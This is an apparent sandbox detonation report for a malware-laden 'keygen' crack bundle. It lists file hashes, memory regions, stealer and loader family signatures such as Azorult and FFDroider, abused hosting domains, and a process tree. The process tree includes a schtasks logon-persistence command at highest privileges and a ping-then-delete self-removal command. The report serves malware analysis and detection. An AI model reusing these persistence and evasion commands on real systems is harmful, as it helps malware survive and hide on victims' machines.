memory/840-34-0x0000000000B20000-0x0000000000CF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
memory/3968-55-0x0000000000E20000-0x0000000000E30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/2912-71-0x0000000000E40000-0x0000000000E48000-memory.dmp
memory/1524-70-0x0000000000E30000-0x0000000000E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/1524-76-0x0000000001600000-0x000000000161A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/3496-97-0x0000000000400000-0x0000000000667000-memory.dmp
memory/3496-103-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4580-102-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/3968-108-0x00000000017C0000-0x00000000017CE000-memory.dmp
memory/3968-109-0x0000000001810000-0x0000000001822000-memory.dmp
memory/3496-112-0x0000000003960000-0x0000000003970000-memory.dmp
memory/3496-118-0x0000000003AC0000-0x0000000003AD0000-memory.dmp
memory/3496-125-0x0000000004560000-0x0000000004568000-memory.dmp
memory/3496-126-0x0000000004580000-0x0000000004588000-memory.dmp
memory/3496-128-0x0000000004620000-0x0000000004628000-memory.dmp
memory/3496-132-0x00000000048C0000-0x00000000048C8000-memory.dmp
memory/3496-131-0x0000000004760000-0x0000000004768000-memory.dmp
memory/3496-133-0x0000000004B70000-0x0000000004B78000-memory.dmp
memory/3496-134-0x0000000004A70000-0x0000000004A78000-memory.dmp
memory/3496-135-0x00000000048E0000-0x00000000048E8000-memory.dmp
memory/3496-148-0x0000000004580000-0x0000000004588000-memory.dmp
memory/3496-156-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | be317fcc9f3c0f0909413e3a9c9f7d6b |
| SHA1 | 26c737cf412744c35a1a68bf33324d8522938ef7 |
| SHA256 | 37605b1267507e235ec32827e141f67a0ab901e329abe9091261eaf1c4217f1f |
| SHA512 | f1fd7a12a1b3dd67bc66d431e5e8f665d66dc09eb15d51d5b153f7eb2bf640143135363d336295fda0905a327bf14d1ac2f47cf4e67f169a60f455135f7ab1eb |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 5385878b74afc82a4c4ef0f1293bb0c0 |
| SHA1 | 1ee9cbf3c7a712ed91b2418b7841ecf8cf895927 |
| SHA256 | fbb4b78aba29fbbbc8153b8d5567bff16d0a4687aee426950b87cd9da1ab22e8 |
| SHA512 | 4a3f40ef3e263026b8d8be4f0cbdd7c3faf90a4a8d95ff07d800db0d7718680ce7015ec3220a54fc97a2b87a54a7c228e3dd5ad7b106b91e1a8f927b508f9fd1 |
memory/3496-158-0x0000000004A10000-0x0000000004A18000-memory.dmp
memory/3496-171-0x0000000004580000-0x0000000004588000-memory.dmp
memory/3496-179-0x0000000004A10000-0x0000000004A18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 2a9bafb7a427371e6a9a42a63b4555f1 |
| SHA1 | f0ece630ee618a71a4ad19fecb8fe0372d94c031 |
| SHA256 | e6b31cf3e28b73fdb3308bf4b4b9be1fe2c2c564971c6ad38cc113b0ae9a61c8 |
| SHA512 | 65411be8e2a6bc9724bce154f7a6a91589acae7437035b78b3d05b3fed5a511c3501e1457a79a0c1837eff3f0393944ed09f3fa3fa5d7206abc172dc7687032b |
memory/3496-181-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | a2463d5f134fc65cebacb6cc4065d11f |
| SHA1 | 1724c6aba247e87199dc78c7363587f1700b4c2a |
| SHA256 | 85be9500c7d0094f44eec5a0721e49bbdbafc6b85e83e4185bf47e8974b1f029 |
| SHA512 | 9cd405c8e2c344417084699e91b1c11b1ee17622e553471b2a7cbdd158ec33b5f8f4255f6bfe50e08e5e2209e31cd60642cbb6639b529020b3f6c151a9af6053 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d
| MD5 | 74ea2aaecbe5947e33ef38278cfc38ed |
| SHA1 | f33ac4d516e60bb98ff82077cccb1480db3e2285 |
| SHA256 | 666aec52b2d7833f2d9cffc19d105cc7971df465f50f724ffc90cf3fdf51707f |
| SHA512 | 3161e3c53337fa53ba0ec4bcc04b3941a53af437d2cc186293d2e055ca9ab6aadba4dfa892f6aad840e33cf3179642e3c896f61016e3ec0192d04cc40f2d0483 |
memory/3496-220-0x0000000004440000-0x0000000004448000-memory.dmp
memory/3496-221-0x0000000004460000-0x0000000004468000-memory.dmp
memory/3496-229-0x0000000004500000-0x0000000004508000-memory.dmp
memory/3496-232-0x0000000004500000-0x0000000004508000-memory.dmp
memory/3496-233-0x0000000004680000-0x0000000004688000-memory.dmp
memory/3496-234-0x0000000004730000-0x0000000004738000-memory.dmp
memory/3496-235-0x0000000004740000-0x0000000004748000-memory.dmp
memory/3496-236-0x0000000004690000-0x0000000004698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 1cb913e62009797ca7788b7a08ecfe53 |
| SHA1 | da4877fab34ec90b0c9a5ca2a88af48795ead464 |
| SHA256 | 63b93118e6f44a1256f69c4dd111e56b0e002245a02d2b98d511ff5637a8ccff |
| SHA512 | 9bdfe407150bea45d2e9d17497a51c0829c386f2e2e6bdc462a92f5a5ec2b83d03f2404f1733a3c36393784cd39de2a9ae1ed4cd57a531401b22ccf8631b980e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 3f4680ff1fcaca0e97be23858c27c1d8 |
| SHA1 | ff59883b3fcd164d722d3015dd5e25c3b77f5f9e |
| SHA256 | d79f1df31ba2919229391e60d257abfb154025745d058050e646c5c7b22e2e2c |
| SHA512 | 754c12e3d994d47d3da1ec7844442dcf35c35f8635e1a731580e83adc0f1b96b44990cd28f6ea942d442a6640383929e50a2445c76143b0718731adc4c8462b0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d2c97799642b7ca5bead234e9a93a812 |
| SHA1 | fc7099e38c1de7d1d57ae314e7c58c3d43b0343b |
| SHA256 | d98e4600c97ce9996be45f0b71e8698820e141a59e85ea97d1bd06b58c1c40d4 |
| SHA512 | a6de5cafae6ac04d24b45bf6d1e9ec5064d3d0e4876610346e7c3bcb5dbfa7133be823086e70a053c22923087ecac927bc6775f0c32d1272e10e6ae36cfd2ca1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d6e2f4fbf99c59fd62708d09c13c63d9 |
| SHA1 | 1c0bf099eb501443f8c71278ff686fcd060ed702 |
| SHA256 | af6a8327169475ac9787082e25b71e1359b6be56557b5fafe16796e44e382d94 |
| SHA512 | 269043bc0ba1989fa6d8b6b0cfc2d8179effc52a691ed300b71f962b506b01564f3bf94a66b9cea19bc71684ddfec96a0294284f3696e688cacdb094f1572d95 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 4c2caf9e16c30eee4876af875aedf853 |
| SHA1 | 1225d85e071953dfa429f54f935c84e4f371992f |
| SHA256 | 8a5850bb25c30fe3adfc6b64f12af0d42211f6f4e013a4602fed7c566b20fef3 |
| SHA512 | 975455b463c9240ca2849fe29ec94649412a15038b0574bb97609e12a2c4c5206e0768c091082177cb9f52a6bff1ca413c67fac73d522468a0e0475313a3315b |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 5dbec7d17ac207e2059ccad5d3c02eb2 |
| SHA1 | 72c57279f427d91935399a3816d41dd6d1bf2ffa |
| SHA256 | 6744af2aed4bedfd36be458fa109072ee6d869e8a433df4669d5f9f5cd68fd4d |
| SHA512 | 8393f9fd02f4c05f462a297f1b39d82b958d7c22983bdfe9f82bf222fab00402a813fecb10ffa77b93ac2bf1496dfde92c33cd70faad5d9c3bb80c38db72d6ae |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 417481c433d1976baac3d90df7ca8123 |
| SHA1 | bc432d861c1d78666e2401fe928fc370e8a0df2d |
| SHA256 | 8e0f43de0070ff21503c21d766c1ebc384d5d404ac6850b70ea5579fe2f58a9b |
| SHA512 | c16c91f451344dd600269d4a53e0a018b231b2004bf138aec00e5f117bcbcf0ea3da2eefefc852c749214986f1339303869dc6246f5dedcf3be9547e11272e94 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | fc1fd9ecba65827c81e85f530c55cebd |
| SHA1 | 87aef49227c18edc0662bd30c41fc50f84ef1080 |
| SHA256 | 65760e79099da0c86aa205ca1f084c07555703f03de572cce2042edc8489af18 |
| SHA512 | cee43bca156000208fa8030972c7ca31b6ecb824de04d3011999b421e4a9b8e509116c2ea5547363c945f0c80141f12363a6337136e4bc610a2f606e76c7ecba |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 4f9cf16fa8f94852e6c823f68835866b |
| SHA1 | 551f93e9b65f25d3b15696958107cdfcfab8c753 |
| SHA256 | c34bf7c1f8d7f4298f53e185bff091b49d2d9a80bd2c2d39873675945270d2ee |
| SHA512 | 1255e5c218b8d451c422b825986fb3055f7d580e41890c7116ff65a67ac09e373752e3bbf02d1a5fb64d9a81a4864aceccd9969de50780776a4a7880292eb406 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 897121573663cd58c8d14a758f42379e |
| SHA1 | cf3e025ed2c8283c0891841a7eb64c90e7ed2d65 |
| SHA256 | ac45d723773ede74ba50136392cc93e29b6c06a86283e578d381f4bca6287933 |
| SHA512 | cc3b97e4c8833e404caf2d71d25f1e6aa8abae2fa038da332a130ef162b417e9b181a49cbcb1ff76209989a20ec87a0c1d90847968e9116e3689a4dc40139d9e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 7021994bdbc2cea4c91a6e0e9c1b9cfd |
| SHA1 | 86d2f125757effd0a9afe137d2ed7cf6d70905b2 |
| SHA256 | 1a0545f2cbfe685dd1789481d3c984ebcd8ff59340b3bb06460a85cb6242036e |
| SHA512 | 90b3f2619a1955544ebbf34ae1924be625bac4a110711af5cdcf5e4ad1e7b089627de31fcf88f9cccaa65bf7f05ddd9e4069067dad701d0dbff8cd0897a68868 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 5957374b7e02ec657bd99bb87805fff1 |
| SHA1 | f18f7bf9248ed57c819ddaa4a68edad49d5a5c1e |
| SHA256 | 49d8c9ab69bde7386cf01ce234b34f631595213a90847512703e7b53aa0ef764 |
| SHA512 | 0d224087b90375afb35f4eeb891d06d7265a2b3635db37dc841b3e2a9870a33854105ed93f1eeb64049c0ebb97f57f2d41cc4dbc9975f95ffa40fc15fb1c6893 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | f34ea50fa63c94d8ebcdbb6afcae16a8 |
| SHA1 | 0b7b97cc801db2d58a70018f8e87f7f9409a0c5a |
| SHA256 | 3c7ecbdc38afca5787f9f735f3e9be744b8d475cba1ca8fc87d732e8cc004bab |
| SHA512 | 8935ea16ba4f898648f716aed36801bbcd54981c099dc61499e2f2d1bdc8864fbac6b601e37e63572d4b33a38b460269db5e5a41ee1a9f6e6f065c010d86bdde |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | a02dfd2cb9de151e5154854ca1f899f2 |
| SHA1 | f4235c0197ad1664b0e619684dbc543b5d21765c |
| SHA256 | 8e5e3bacabb7342edbf723de1dc367902cf73ee27199cb1f930a8da3504feecb |
| SHA512 | e280abea37f696e03c4ce20811c44b36cb38473952bc3e252a1df880872de5582d631c072c0aa2e1643bbde2b441c4fae33db5524ec2297a72f1516216a58714 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW
| MD5 | d3587b25682e6badd3938bf3105ff1b2 |
| SHA1 | 8d94a6e94e2c23c55716ca11545f2d82c1c961f8 |
| SHA256 | ad65e47dee4ab88cb7c18b404d49b4eefdb5b7e9c10e520cdb2f3a377a82fd68 |
| SHA512 | b0fe622fac6445bb20c0de78043ece97f370cb92637694c9712dcc47a9d1ed1bd27f87db16f2c9a6970be3af5e31487e06843943f23faa6b0d87d4fba5844cbf |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 3b6d52f2f7bc1b8f8d0b7ea14fc3a908 |
| SHA1 | 14828c26955430a62dbefe9ceaa89a731749545f |
| SHA256 | 2fcf61843733833b1a1da0fcfd365e406ae3ec36dcb57cee0330228efd011ee7 |
| SHA512 | ddec87bfa047473788b3e6a349e5433264ba859c8a25a3f30aec0525e635039bc0f87715223d1a2677e40adff80a66ea9eb26840251e99b1be020d1ed4725872 |
memory/3496-622-0x0000000000400000-0x0000000000667000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/4328-642-0x0000000000F30000-0x0000000000F4E000-memory.dmp
memory/4328-643-0x0000000002E90000-0x0000000002EAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1216-672-0x00000000003D0000-0x00000000003D6000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Azorult
Azorult family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 464 set thread context of 4036 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
keygen-step-4.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 972
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 4388
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1392
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 688 -ip 688
C:\Windows\SysWOW64\WerFault.exe
